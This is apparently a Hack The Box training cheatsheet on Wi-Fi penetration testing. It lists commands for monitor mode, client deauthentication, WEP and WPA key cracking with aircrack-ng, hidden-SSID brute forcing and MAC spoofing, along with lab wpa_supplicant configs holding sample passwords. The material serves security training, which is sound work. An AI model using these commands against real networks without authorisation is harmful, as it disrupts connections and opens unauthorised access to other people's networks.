Command Palette

Search for a command to run...

Cheatsheets
PreviousNext

Wi-Fi Penetration Testing Basics

Interfaces and Interface Modes

CommandDescription
sudo iw reg set USSet Region for the Interface.
sudo ifconfig wlan0 down && sudo iwconfig wlan0 txpower 30 && sudo ifconfig wlan0 upChange the Interface Strength.
iwlist wlan0 scan | grep 'Cell|Quality'Scan and display available networks with signal quality.
sudo ifconfig wlan0 down && sudo iwconfig wlan0 channel 64 && sudo ifconfig wlan0 upChange the Interface Channel.
sudo ifconfig wlan0 down && sudo iwconfig wlan0 freq "5.52G" && sudo ifconfig wlan0 upChange the Interface Frequency.
sudo ifconfig wlan0 down && sudo iwconfig wlan0 mode managed && sudo ifconfig wlan0 upSet the Interface to Managed Mode.
sudo iwconfig wlan0 mode ad-hoc && sudo iwconfig wlan0 essid HTB-MeshSet the Interface to Ad-hoc Mode.
sudo iw dev wlan0 set type meshSet the Interface to Mesh Mode.
sudo ifconfig wlan0 down && sudo iw wlan0 set monitor control && sudo ifconfig wlan0 upSet the Interface to Monitor Mode.

Aircrack-ng Essentials

CommandDescription
sudo airmon-ng start wlan0Start Monitor mode using airmon-ng.
sudo airmon-ng start wlan0 11Start Monitor mode using airmon-ng on a specific channel.
sudo airodump-ng wlan0monScan available Wi-Fi networks using airodump-ng.
sudo airodump-ng -c 11 wlan0monScan available Wi-Fi networks on a specific channel.
sudo airodump-ng wlan0mon --band aScan 5 GHz Wi-Fi bands.
sudo airodump-ng wlan0mon -w HTBSave the airodump-ng output to a file.
airgraph-ng -i HTB-01.csv -g CAPR -o HTB_CAPR.pngGenerate Clients to AP Relationship Graph.
airgraph-ng -i HTB-01.csv -g CPG -o HTB_CPG.pngGenerate Common Probe Graph.
sudo aireplay-ng --test wlan0monTest for Packet Injection.
aireplay-ng -0 5 -a 00:14:6C:7A:41:81 -c 00:0F:B5:32:31:31 wlan0monPerform Deauthentication using Aireplay-ng.
airdecap-ng -w 1234567890ABCDEF HTB-01.capDecrypt WEP-encrypted captures.
aircrack-ng -K HTB.ivsCrack WEP using aircrack-ng.
aircrack-ng HTB.pcap -w /opt/wordlist.txtCrack WPA using aircrack-ng.

Connection Methods

WEP Network

network={
    ssid="HackTheBox"
    key_mgmt=NONE
    wep_key0=3C1C3A3BAB
    wep_tx_keyidx=0
}

wpa_supplicant -c wep.conf -i wlan0

WPA Personal Network

network={
    ssid="HackMe"
    psk="password123"
}

wpa_supplicant -c wpa.conf -i wlan0

WPA Enterprise Network

network={
    ssid="HTB-Corp"
    key_mgmt=WPA-EAP
    identity="HTB\Administrator"
    password="Admin@123"
}

wpa_supplicant -c wpa_enterprise.conf -i wlan0

Basic Control Bypass

CommandDescription
mdk3 wlan0mon p -b u -c 1 -t A2:FF:31:2C:B1:C4Bruteforce Hidden SSID for all possible values.
mdk3 wlan0mon p -f /opt/wordlist.txt -t D2:A3:32:13:29:D5Bruteforce Hidden SSID using a Wordlist.
airmon-ng stop wlan0mon && sudo macchanger wlan0 -m 3E:48:72:B7:62:2A && sudo ifconfig wlan0 upChange the MAC address of the interface.